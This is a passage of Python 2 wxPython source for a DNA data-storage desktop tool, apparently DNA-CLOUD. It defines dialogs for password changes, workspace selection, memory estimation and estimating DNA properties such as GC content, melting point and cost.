self.vBox.Add(self.hBoxe, flag = wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_CENTER_VERTICAL)
self.saveBut.Bind(wx.EVT_BUTTON,self.save)
self.cancelBut.Bind(wx.EVT_BUTTON,self.cancel)
self.SetSizer(self.vBox)
self.SetSize((570,250))
def save(self,e):
con = sqlite3.connect(PATH + '/../database/prefs.db')
try:
cur = con.cursor()
string = cur.execute('SELECT * FROM prefs WHERE id = 5').fetchone()[1]
if "linux" in sys.platform:
string = unicodedata.normalize('NFKD', string).encode('ascii','ignore')
if string == 'true':
oldPassword = (cur.execute('SELECT * FROM prefs where id = 6').fetchone())[1]
if "linux" in sys.platform:
oldPassword = unicodedata.normalize('NFKD', oldPassword).encode('ascii','ignore')
if self.txta.GetString(0,self.txta.GetLastPosition()) != oldPassword or self.txtc.GetString(0,self.txtc.GetLastPosition()) != self.txtd.GetString(0,self.txtd.GetLastPosition()):
wx.MessageBox('Your Passwords donot match or else your old password might be wrong', 'Information!',wx.OK | wx.ICON_INFORMATION)
else:
cur.execute('UPDATE prefs SET details = ? WHERE id = ?',(self.txtd.GetString(0,self.txtd.GetLastPosition()),6))
con.execute('UPDATE prefs SET details = ? WHERE id = ?',("true",5))
self.Destroy()
wx.MessageBox('Your Password has been updated!!', 'Information!',wx.OK |wx.ICON_INFORMATION)
else:
if self.txtc.GetString(0,self.txtc.GetLastPosition()) != self.txtd.GetString(0,self.txtd.GetLastPosition()):
wx.MessageBox('Your Passwords donot match', 'Information!',wx.OK | wx.ICON_INFORMATION)
else:
cur.execute('UPDATE prefs SET details = ? WHERE id = ?',(self.txtd.GetString(0,self.txtd.GetLastPosition()),6))
con.execute('UPDATE prefs SET details = ? WHERE id = ?',("true",5))
self.Destroy()
wx.MessageBox('Your Password has been updated!!', 'Information!',wx.OK |wx.ICON_INFORMATION)
con.commit()
except sqlite3.OperationalError:
DATABASE_ERROR = True
self.Destroy()
if con:
con.close()
def cancel(self,e):
self.Destroy()
#dialog used to select encode /decode while the software starts
class chooseDialog(wx.Dialog):
def __init__(self,parent,id,title):
wx.Dialog.__init__(self,parent,id,title)
self.vBox = wx.BoxSizer(wx.VERTICAL)
ico = wx.Icon(PATH + '/../icons/DNAicon.ico', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
head = wx.StaticText(self ,label = "Please Select your Choice",style = wx.CENTER)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT |wx.ALIGN_CENTER_HORIZONTAL, border = 5)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.encodeBut = wx.Button(self,label = "File To DNA(Encode)")
self.decodeBut = wx.Button(self,label = "DNA To File(Decode)")
self.vBox.Add(self.encodeBut,flag = wx.TOP | wx.BOTTOM | wx.ALIGN_CENTER_HORIZONTAL ,border = 10,proportion = 1)
self.vBox.Add(self.decodeBut,flag = wx.TOP | wx.BOTTOM | wx.ALIGN_CENTER_HORIZONTAL ,border = 10,proportion = 1)
self.SetSizer(self.vBox)
self.SetSize((300,150))
class workspaceLauncher(wx.Dialog):
def __init__(self,parent,id,title):
wx.Dialog.__init__(self,parent,id,title)
self.vBox = wx.BoxSizer(wx.VERTICAL)
ico = wx.Icon(PATH + '/../icons/DNAicon.ico', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
header = wx.TextCtrl(self,name = "hBox",size = (350,60),style= wx.TE_READONLY | wx.TE_MULTILINE)
self.vBox.Add(header,flag = wx.EXPAND | wx.ALL , border = 10)
header.WriteText(HEADER_TEXT)
head = wx.StaticText(self ,label = "Select your Workspace",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head, flag = wx.EXPAND | wx.TOP | wx.LEFT, border = 10)
line1 = wx.StaticLine(self, size=(350,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.cbList = []
if "win" in sys.platform and not 'darwin' in sys.platform:
con = sqlite3.connect(PATH + '\..\database\workspace.db')
elif "linux" in sys.platform or 'darwin' in sys.platform:
con = sqlite3.connect(PATH + '/../database/workspace.db')
try:
cur = con.cursor()
for i in cur.execute('SELECT * FROM workspace'):
if "linux" in sys.platform:
self.cbList.append(unicodedata.normalize('NFKD', i[1]).encode('ascii','ignore'))
elif "win" in sys.platform:
self.cbList.append(i[1])
except:
LIST_ERROR = True
con = sqlite3.connect(PATH + '/../database/prefs.db')
with con:
cur = con.cursor()
self.defaultWorkspace = cur.execute('SELECT * FROM prefs WHERE id = 7').fetchone()[1]
if "linux" in sys.platform:
self.defaultWorkspace = unicodedata.normalize('NFKD', self.defaultWorkspace).encode('ascii','ignore')
if self.defaultWorkspace == "True":
self.defaultWorkspace = True
else:
self.defaultWorkspace = False
con.close()
self.hBox = wx.BoxSizer(wx.HORIZONTAL)
self.cb = wx.ComboBox(self, -1, size = (350,30), choices = self.cbList, style = wx.CB_DROPDOWN)
self.hBox.Add(self.cb, proportion = 4, flag = wx.LEFT | wx.TOP, border = 5)
self.browBut = wx.Button(self , label = "Browse")
self.hBox.Add(self.browBut, proportion = 1, flag = wx.ALIGN_CENTER_HORIZONTAL | wx.LEFT | wx.RIGHT | wx.TOP , border = 5)
self.vBox.Add(self.hBox)
self.hBox1 = wx.BoxSizer(wx.HORIZONTAL)
self.defCheckBox = wx.CheckBox(self, -1, label = "Set this workspace as default and don't ask me again", style = wx.CHK_2STATE)
self.hBox1.Add(self.defCheckBox, wx.EXPAND | wx.LEFT | wx.RIGHT, border = 10)
self.vBox.Add(self.hBox1, proportion = 1, flag = wx.ALIGN_CENTER_VERTICAL | wx.TOP | wx.BOTTOM, border = 20)
self.defCheckBox.SetValue(self.defaultWorkspace)
self.hBox2 = wx.BoxSizer(wx.HORIZONTAL)
self.okBut = wx.Button(self, wx.ID_OK,size = (100,30))
self.cancelBut = wx.Button(self, wx.ID_CANCEL, size = (100,30))
self.hBox2.Add(self.okBut, flag = wx.ALIGN_CENTER_HORIZONTAL | wx.RIGHT | wx.BOTTOM, border = 10)
self.hBox2.Add(self.cancelBut, flag = wx.ALIGN_CENTER_HORIZONTAL | wx.LEFT | wx.BOTTOM, border = 10)
self.vBox.Add(self.hBox2,flag = wx.ALIGN_CENTER)
self.SetSizerAndFit(self.vBox)
self.browBut.Bind(wx.EVT_BUTTON,self.onChoose)
self.okBut.Bind(wx.EVT_BUTTON,self.okay)
self.cancelBut.Bind(wx.EVT_BUTTON,self.cancel)
self.isNew = False
self.savePath = None
#This is necessary since we dont want to close software when cancel button is pressed in case of SWITCH WORKSPACE
if id == 102:
self.cancelBut.Disable()
def onChoose(self,e):
locationSelector = wx.DirDialog(self,"Please select some location to save all your file",style = wx.DD_DEFAULT_STYLE | wx.DD_NEW_DIR_BUTTON)
if locationSelector.ShowModal() == wx.ID_OK:
paths = locationSelector.GetPath()
if "win" in sys.platform:
self.savePath = paths
elif "linux" in sys.platform:
self.savePath = unicodedata.normalize('NFKD', paths).encode('ascii','ignore')
self.cb.SetValue(self.savePath)
else:
self.savePath = None
def okay(self,e):
if self.savePath == None:
if "win" in sys.platform:
if self.cb.GetValue() == "":
wx.MessageDialog(self,'Please select some Folder for Workspace', 'Error',wx.OK | wx.ICON_ERROR | wx.STAY_ON_TOP).ShowModal()
return
else:
self.savePath = self.cb.GetValue()
elif "linux" in sys.platform:
if unicodedata.normalize('NFKD', self.cb.GetValue()).encode('ascii','ignore') == "":
wx.MessageDialog(self,'Please select some Folder for Workspace', 'Error',wx.OK | wx.ICON_ERROR | wx.STAY_ON_TOP).ShowModal()
return
else:
self.savePath = unicodedata.normalize('NFKD', self.cb.GetValue()).encode('ascii','ignore')
if self.savePath in self.cbList:
self.isNew = False
else:
self.isNew = True
if self.defCheckBox.IsChecked():
self.defaultWorkspace = True
else:
self.defaultWorkspace = False
if "win" in sys.platform and not 'darwin' in sys.platform:
con1 = sqlite3.connect(PATH + '\..\database\prefs.db')
con = sqlite3.connect(PATH + '\..\database\workspace.db')
elif "linux" in sys.platform or 'darwin' in sys.platform:
con1 = sqlite3.connect(PATH + '/../database/prefs.db')
con = sqlite3.connect(PATH + '/../database/workspace.db')
try:
cur1 = con1.cursor()
cur1.execute('UPDATE prefs SET details = ? WHERE id = ?',(str(self.defaultWorkspace),7))
cur1.execute('UPDATE prefs SET details = ? WHERE id = ?',(self.savePath,8))
count = cur1.execute('SELECT * FROM prefs WHERE id = 9').fetchone()[1]
if "linux" in sys.platform:
count = unicodedata.normalize('NFKD', count).encode('ascii','ignore')
if self.isNew:
count = `(int(count) + 1)`
cur1.execute('UPDATE prefs SET details = ? WHERE id = ?',(count,9))
con1.commit()
except:
print "PREF_ERROR"
DB_ERROR_PREFS = True
con1.close()
if self.isNew:
try:
cur = con.cursor()
cur.execute('INSERT INTO workspace VALUES(?,?)',(int(count),self.savePath))
con.commit()
con.close()
except sqlite3.OperationalError:
cur = con.cursor()
#cur.execute('DROP TABLE IF EXISTS workspace')
cur.execute('CREATE TABLE workspace(id INT,path TEXT NOT NULL)')
cur.execute('INSERT INTO workspace VALUES(?,?)',(1,self.savePath))
con.commit()
con.close()
self.Destroy()
def cancel(self,e):
sys.exit(0)
class memEstimator(wx.Dialog):
def __init__(self,parent,id,title):
wx.Dialog.__init__(self,parent,id,title)
self.vBox = wx.BoxSizer(wx.VERTICAL)
ico = wx.Icon(PATH + '/../icons/DNAicon.ico', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
if not 'darwin' in sys.platform:
head = wx.StaticText(self ,label = "Memory Estimation",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
else:
head = wx.StaticText(self ,label = "Memory Estimation",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(16, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 8)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.hBox = wx.BoxSizer(wx.HORIZONTAL)
self.butChoose = wx.Button(self , label = "Choose File")
self.hBox.Add(self.butChoose,flag = wx.EXPAND | wx.LEFT | wx.RIGHT , border = 10,proportion = 1)
path = wx.StaticText(self, label = "Select a data file from your Computer")
self.hBox.Add(path,flag = wx.ALIGN_CENTER_VERTICAL | wx.RIGHT,proportion = 2,border = 10)
self.vBox.Add(self.hBox)
self.txt = wx.TextCtrl(self,name = "hBox",size = (200,250),style= wx.TE_READONLY | wx.TE_MULTILINE)
self.vBox.Add(self.txt,flag = wx.EXPAND | wx.ALL , border = 10)
if not 'darwin' in sys.platform:
head = wx.StaticText(self ,label = "Disclaimer:This values are just an approximation,the actual\nvalues may vary",style = wx.ALIGN_CENTRE_HORIZONTAL)
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
else:
head = wx.StaticText(self ,label = "Disclaimer:This values are just an approximation,the actual\nvalues may vary",style = wx.ALIGN_CENTRE_HORIZONTAL)
font = wx.Font(12, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
#head.Wrap(440)
self.vBox.Add(head ,flag = wx.TOP | wx.LEFT | wx.RIGHT, border = 10)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.butOk = wx.Button(self , label = "OK")
self.vBox.Add(self.butOk,flag = wx.ALIGN_CENTER_HORIZONTAL | wx.BOTTOM , border = 10)
self.SetSizerAndFit(self.vBox)
#self.SetSize((370,470))
self.butChoose.Bind(wx.EVT_BUTTON,self.onChoose)
self.butOk.Bind(wx.EVT_BUTTON,self.ok)
def onChoose(self,e):
self.txt.Clear()
fileSelector = wx.FileDialog(self, message="Choose a file",defaultFile="",style=wx.OPEN | wx.MULTIPLE | wx.CHANGE_DIR )
if fileSelector.ShowModal() == wx.ID_OK:
paths = fileSelector.GetPaths()
if "win" in sys.platform and not 'darwin' in sys.platform:
path = paths[0]
elif "linux" in sys.platform or 'darwin' in sys.platform:
path = unicodedata.normalize('NFKD', paths[0]).encode('ascii','ignore')
length = os.path.getsize(path)
dnaLength = int(5.5 * length)
dnaStringMem = 6 * length
dnaStringMem = dnaStringMem/CHUNK_SIZE
if dnaStringMem == 0:
dnaStringMem = 1
dnaListMem = (((dnaLength)/25) - 3) * 117
dnaListMem = dnaListMem/CHUNK_SIZE
if dnaListMem == 0:
dnaListMem = 1
errorCorrectionMem = 15 * length
line1 = "File Size(bytes) : \t\t" + str(length)
line2 = "Size of DNA String : \t" + str(dnaLength)
line3 = "Free Memory Required : \n" + "To genrate DNA String :\t" + str(dnaStringMem) + " MB\n" + "To generate DNA Chunks :\t" + str(dnaListMem) + " MB\n"
line4 = "Amount of DNA Required : \t" + str(length / (455 * (10.0 ** 18)))
text = line1 + "\n\n" + line2 + "\n\n" + line3 + "\n\n" + line4 + " gms\n\n" + "File Selected : " + path
self.txt.WriteText(text)
fileSelector.Destroy()
def ok(self,e):
self.Destroy()
class estimator(wx.Dialog):
def __init__(self,parent,id,title):
wx.Dialog.__init__(self,parent,id,title)
self.vBox = wx.BoxSizer(wx.VERTICAL)
ico = wx.Icon(PATH + '/../icons/DNAicon.ico', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
if "win" in sys.platform and not 'darwin' in sys.platform:
head = wx.StaticText(self ,label = "Biochemical Property Estimator",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 5)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox = wx.BoxSizer(wx.HORIZONTAL)
self.butChoose = wx.Button(self , label = "Choose File")
self.hBox.Add(self.butChoose,flag = wx.LEFT | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL , border = 10,proportion = 1)
path = wx.StaticText(self, label = "Select a DNA file from your Computer",style = wx.ALIGN_CENTER_VERTICAL)
self.hBox.Add(path,flag = wx.ALIGN_CENTER_VERTICAL,proportion = 2)
self.vBox.Add(self.hBox)
self.hBox1 = wx.BoxSizer(wx.HORIZONTAL)
text1 = wx.StaticText(self, label = " Enter salt concentration(mM) :",style = wx.ALIGN_CENTER)
self.saltText = wx.TextCtrl(self,name = "Salt Concentration")
self.hBox1.Add(text1, 1, wx.EXPAND)
self.hBox1.Add(self.saltText, 2, wx.EXPAND | wx.LEFT , border = 15)
self.vBox.Add(self.hBox1,flag = wx.TOP | wx.BOTTOM , border = 5)
self.hBox2 = wx.BoxSizer(wx.HORIZONTAL)
text1 = wx.StaticText(self, label = " Enter cost for a base($) : \t\t",style = wx.ALIGN_CENTER)
self.priceText = wx.TextCtrl(self,name = "Price")
self.hBox2.Add(text1, 1, wx.EXPAND)
self.hBox2.Add(self.priceText, 2, wx.EXPAND | wx.LEFT, border = 15)
self.vBox.Add(self.hBox2,flag = wx.TOP | wx.BOTTOM , border = 5)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.txt = wx.TextCtrl(self,name = "hBox",size = (200,250),style= wx.TE_READONLY | wx.TE_MULTILINE)
self.vBox.Add(self.txt,flag = wx.EXPAND | wx.ALL , border = 10)
head = wx.StaticText(self ,label = "Disclaimer:This values are just an approximation and the actual values may vary",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT |wx.ALIGN_CENTER_HORIZONTAL | wx.RIGHT, border = 10)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.hBox3 = wx.BoxSizer(wx.HORIZONTAL)
self.butCalc = wx.Button(self , label = " Calculate ")
self.butCancel = wx.Button(self, label = " Close ")
self.butSave = wx.Button(self , label = " Save ")
self.hBox3.Add(self.butCalc, 1, wx.RIGHT , border = 5)
self.hBox3.Add(self.butSave, 1, wx.LEFT | wx.RIGHT , border = 5)
self.hBox3.Add(self.butCancel, 1, wx.LEFT , border = 5)
self.vBox.Add(self.hBox3,flag = wx.ALIGN_CENTER_HORIZONTAL | wx.TOP | wx.BOTTOM, border = 10)
self.SetSizerAndFit(self.vBox)
elif "linux" in sys.platform:
head = wx.StaticText(self ,label = "Estimate properties",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 5)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox = wx.BoxSizer(wx.HORIZONTAL)
self.butChoose = wx.Button(self , label = "Choose File")
self.hBox.Add(self.butChoose,flag = wx.LEFT | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL , border = 10,proportion = 1)
path = wx.StaticText(self, label = "Select a DNA File from your File System",style = wx.ALIGN_CENTER_VERTICAL)
self.hBox.Add(path,flag = wx.ALIGN_CENTER_VERTICAL,proportion = 2)
self.vBox.Add(self.hBox)
self.hBox1 = wx.BoxSizer(wx.HORIZONTAL)
text1 = wx.StaticText(self, label = " Enter Na+ salt concentration (mM) :",style = wx.ALIGN_CENTER)
self.saltText = wx.TextCtrl(self,name = "Salt Concentration",size = (200,30))
self.hBox1.Add(text1)
self.hBox1.Add(self.saltText)
self.vBox.Add(self.hBox1,flag = wx.TOP | wx.BOTTOM , border = 5)
self.hBox2 = wx.BoxSizer(wx.HORIZONTAL)
text1 = wx.StaticText(self, label = " Enter base pair cost ($) :\t\t\t",style = wx.ALIGN_CENTER)
self.priceText = wx.TextCtrl(self,name = "Price",size = (200,30))
self.hBox2.Add(text1)
self.hBox2.Add(self.priceText)
self.vBox.Add(self.hBox2,flag = wx.TOP | wx.BOTTOM , border = 5)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.txt = wx.TextCtrl(self,name = "hBox",size = (200,250),style= wx.TE_READONLY | wx.TE_MULTILINE)
self.vBox.Add(self.txt,flag = wx.EXPAND | wx.ALL , border = 10)
head = wx.StaticText(self ,label = "Disclaimer:This values are just an approximation and the actual values may vary",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT |wx.ALIGN_CENTER_HORIZONTAL | wx.RIGHT, border = 10)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.hBox3 = wx.BoxSizer(wx.HORIZONTAL)
self.butCalc = wx.Button(self , label = "Calculate")
self.butCancel = wx.Button(self, label = "Close")
self.butSave = wx.Button(self , label = "Save")
self.hBox3.Add(self.butCalc,proportion = 1)
self.hBox3.Add(self.butSave,proportion = 1)
self.hBox3.Add(self.butCancel,proportion = 1)
self.vBox.Add(self.hBox3,flag = wx.ALIGN_CENTER_HORIZONTAL | wx.TOP | wx.BOTTOM, border = 5)
self.SetSizer(self.vBox)
self.SetSize((500,580))
elif "darwin" in sys.platform:
head = wx.StaticText(self ,label = "Estimate properties",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(16, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 8)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox = wx.BoxSizer(wx.HORIZONTAL)
self.butChoose = wx.Button(self , label = "Choose File")
self.hBox.Add(self.butChoose,flag = wx.LEFT | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL , border = 10,proportion = 1)
path = wx.StaticText(self, label = "Select a DNA File from your File System",style = wx.ALIGN_CENTER_VERTICAL)
self.hBox.Add(path,flag = wx.ALIGN_CENTER_VERTICAL,proportion = 2)
self.vBox.Add(self.hBox)
self.hBox1 = wx.BoxSizer(wx.HORIZONTAL)
text1 = wx.StaticText(self, label = " Enter Na+ salt concentration (mM) :\t",style = wx.ALIGN_CENTER)
self.saltText = wx.TextCtrl(self,name = "Salt Concentration",size = (200,25))
self.hBox1.Add(text1)
self.hBox1.Add(self.saltText)
self.vBox.Add(self.hBox1,flag = wx.TOP | wx.BOTTOM , border = 8)
self.hBox2 = wx.BoxSizer(wx.HORIZONTAL)
text1 = wx.StaticText(self, label = " Enter base pair cost ($) :\t\t\t\t",style = wx.ALIGN_CENTER)
self.priceText = wx.TextCtrl(self,name = "Price",size = (200,25))
self.hBox2.Add(text1)
self.hBox2.Add(self.priceText)
self.vBox.Add(self.hBox2,flag = wx.TOP | wx.BOTTOM , border = 8)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.txt = wx.TextCtrl(self,name = "hBox",size = (200,250),style= wx.TE_READONLY | wx.TE_MULTILINE)
self.vBox.Add(self.txt,flag = wx.EXPAND | wx.ALL , border = 10)
head = wx.StaticText(self ,label = "Disclaimer:This values are just an approximation and the actual values may vary",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(12, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT |wx.ALIGN_CENTER_HORIZONTAL | wx.RIGHT, border = 10)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.hBox3 = wx.BoxSizer(wx.HORIZONTAL)
self.butCalc = wx.Button(self , label = "Calculate")
self.butCancel = wx.Button(self, label = "Close")
self.butSave = wx.Button(self , label = "Save")
self.hBox3.Add(self.butCalc,proportion = 1, flag = wx.LEFT | wx.RIGHT , border = 5)
self.hBox3.Add(self.butSave,proportion = 1, flag = wx.LEFT | wx.RIGHT , border = 5)
self.hBox3.Add(self.butCancel,proportion = 1, flag = wx.LEFT | wx.RIGHT , border = 5)
self.vBox.Add(self.hBox3,flag = wx.ALIGN_CENTER_HORIZONTAL | wx.TOP | wx.BOTTOM, border = 5)
self.SetSizer(self.vBox)
self.SetSize((500,580))
self.butChoose.Bind(wx.EVT_BUTTON,self.onChoose)
self.butCancel.Bind(wx.EVT_BUTTON,self.onCancel)
self.butCalc.Bind(wx.EVT_BUTTON,self.calc)
self.butSave.Bind(wx.EVT_BUTTON,self.onSave)
self.butSave.Disable()
self.path = None
def onChoose(self,e):
self.butSave.Disable()
self.txt.Clear()
self.priceText.Clear()
self.saltText.Clear()
fileSelector = wx.FileDialog(self, message="Choose a file",defaultFile="",style=wx.OPEN | wx.MULTIPLE | wx.CHANGE_DIR )
if fileSelector.ShowModal() == wx.ID_OK:
paths = fileSelector.GetPaths()
self.path = unicodedata.normalize('NFKD', paths[0]).encode('ascii','ignore')
self.txt.WriteText("#File Selected : " + self.path)
fileSelector.Destroy()
def calc(self,e):
self.txt.Clear()
if self.path != None:
if not self.saltText.IsEmpty() and not self.priceText.IsEmpty() and FILE_EXT in self.path:
"""
tempTuple = extraModules.getGCContent(self.path)
noOfGCPairs = tempTuple[0]; self.minGC = (tempTuple[1] * 100)/OLIGO_SIZE; self.maxGC = (tempTuple[2] * 100)/OLIGO_SIZE
print tempTuple[0] , tempTuple[1] , tempTuple[2]
totalPairs = os.path.getsize(PATH + "/../.temp/dnaString.txt")
self.GCContent = (noOfGCPairs * 100)/totalPairs
self.totalCost = int(self.priceText.GetString(0,self.priceText.GetLastPosition())) * totalPairs
naContent = int(self.saltText.GetString(0,self.saltText.GetLastPosition()))
self.minMeltingPoint = (81.5 + 16.6 * math.log10(naContent) + 0.41 * (self.minGC) - 600)/OLIGO_SIZE
self.maxMeltingPoint = (81.5 + 16.6 * math.log10(naContent) + 0.41 * (self.maxGC) - 600)/OLIGO_SIZE
self.details = "#Details for the DNA :\n\n- GC Content(% in DNA String):\t\t\t" + `self.GCContent` + "\n- Total Cost($ of DNA String):\t\t\t" + `self.totalCost` + "\n- Min Melting Point(℃/nucleotide):\t" + str(self.minMeltingPoint) + "\n- Max Melting Point(℃/nucleotide):\t" + str(self.maxMeltingPoint)
"""
con = sqlite3.connect(PATH + '/../database/prefs.db')
with con:
cur = con.cursor()
WORKSPACE_PATH = cur.execute('SELECT * FROM prefs WHERE id = 8').fetchone()[1]
if "linux" in sys.platform:
WORKSPACE_PATH = unicodedata.normalize('NFKD', WORKSPACE_PATH).encode('ascii','ignore')
if not os.path.isdir(WORKSPACE_PATH + '/.temp'):
os.mkdir(WORKSPACE_PATH + '/.temp')
try:
float(self.saltText.GetString(0,self.saltText.GetLastPosition()))
float(self.saltText.GetString(0,self.saltText.GetLastPosition()))
except ValueError:
wx.MessageDialog(self,'Please fill numbers and not alphabets', 'Error',wx.OK | wx.ICON_ERROR | wx.STAY_ON_TOP).ShowModal()
return
self.naContent = float(self.saltText.GetString(0,self.saltText.GetLastPosition()))
self.costPerBase = float(self.priceText.GetString(0,self.priceText.GetLastPosition()))
if 'darwin' in sys.platform:
p = threading.Thread(name = "GC Content Grabber", target = extraModules.getGCContent, args = (self.path,self.costPerBase,self.naContent,))
else:
p = multiprocessing.Process(target = extraModules.getGCContent , args = (self.path,self.costPerBase,self.naContent,) , name = "Checking Details Process")
p.start()
temp = wx.ProgressDialog('Please wait...','Analysing the String....This may take a while....' ,parent = self,style = wx.PD_APP_MODAL | wx.PD_CAN_ABORT | wx.PD_ELAPSED_TIME)
terminated = False
temp.SetSize((450,180))
if 'darwin' in sys.platform:
while p.isAlive():
time.sleep(0.1)
if not temp.UpdatePulse("Encoding the File....This may take several minutes...\n\tso sit back and relax.....")[0]:
wx.MessageDialog(self,'Cannot be stopped.Sorry', 'Information!',wx.OK | wx.ICON_INFORMATION | wx.STAY_ON_TOP).ShowModal()
temp.Destroy()
if not p.isAlive():
p.join()
else:
while len(multiprocessing.active_children()) != 0:
time.sleep(0.1)
if not temp.UpdatePulse("Analysing the File....This may take several minutes...\n\tso sit back and relax.....")[0]:
p.terminate()
terminated = True
break
p.join()
temp.Destroy()
p.terminate()
if not terminated:
tempFile = open(WORKSPACE_PATH + "/.temp/details.txt","rb")
self.details = tempFile.read()
self.txt.WriteText(self.details)
tempFile.close()
self.butSave.Enable()
else:
wx.MessageDialog(self,'Make sure you filled the required details and .dnac file is selected', 'Error',wx.OK | wx.ICON_ERROR | wx.STAY_ON_TOP).ShowModal()
else:
wx.MessageDialog(self,'Make sure you selected a .dnac file', 'Error',wx.OK | wx.ICON_ERROR | wx.STAY_ON_TOP).ShowModal()
def onSave(self,e):
con = sqlite3.connect(PATH + '/../database/prefs.db')
with con:
cur = con.cursor()
WORKSPACE_PATH = cur.execute('SELECT * FROM prefs WHERE id = 8').fetchone()[1]
if "linux" in sys.platform:
WORKSPACE_PATH = unicodedata.normalize('NFKD', WORKSPACE_PATH).encode('ascii','ignore')
if not os.path.isdir(WORKSPACE_PATH + '/.temp'):
os.mkdir(WORKSPACE_PATH +'/.temp')
## if string == 'None':
## locationSelector = wx.FileDialog(self,"Please select location to save your details",style = wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT)
## if locationSelector.ShowModal() == wx.ID_OK:
## paths = locationSelector.GetPath()
## self.savePath = paths
##
## propFile = file(self.savePath + ".txt","w")
## propFile.write("#Input Details:-\n\n- Salt Concentration :\t\t" + str(self.naContent) + "\n- Cost per Base :\t\t" + str(self.costPerBase) + "\n\n" + self.details)
## #propFile.write("\n\n\n © 2013 - GUPTA RESEARCH LABS - Generated by DNA-CLOUD")
##
## wx.MessageDialog(self,'Details written to file', 'Info',wx.OK | wx.ICON_INFORMATION | wx.STAY_ON_TOP).ShowModal()
## else:
## locationSelector.Destroy()
## del locationSelector
xtime = datetime.now().timetuple()
self.savePath = WORKSPACE_PATH + "/details_encodedFile_" + `xtime[2]` + "_" + `xtime[1]` + "_" + `xtime[0]`
propFile = file(self.savePath + ".txt","w")
propFile.write("#Input Details:-\n\n- Salt Concentration :\t\t" + str(self.naContent) + "\n- Cost per Base :\t\t" + str(self.costPerBase) + "\n\n" + self.details)
wx.MessageDialog(self,'Details written to file', 'Info',wx.OK | wx.ICON_INFORMATION | wx.STAY_ON_TOP).ShowModal()
def onCancel(self,e):
self.Destroy()
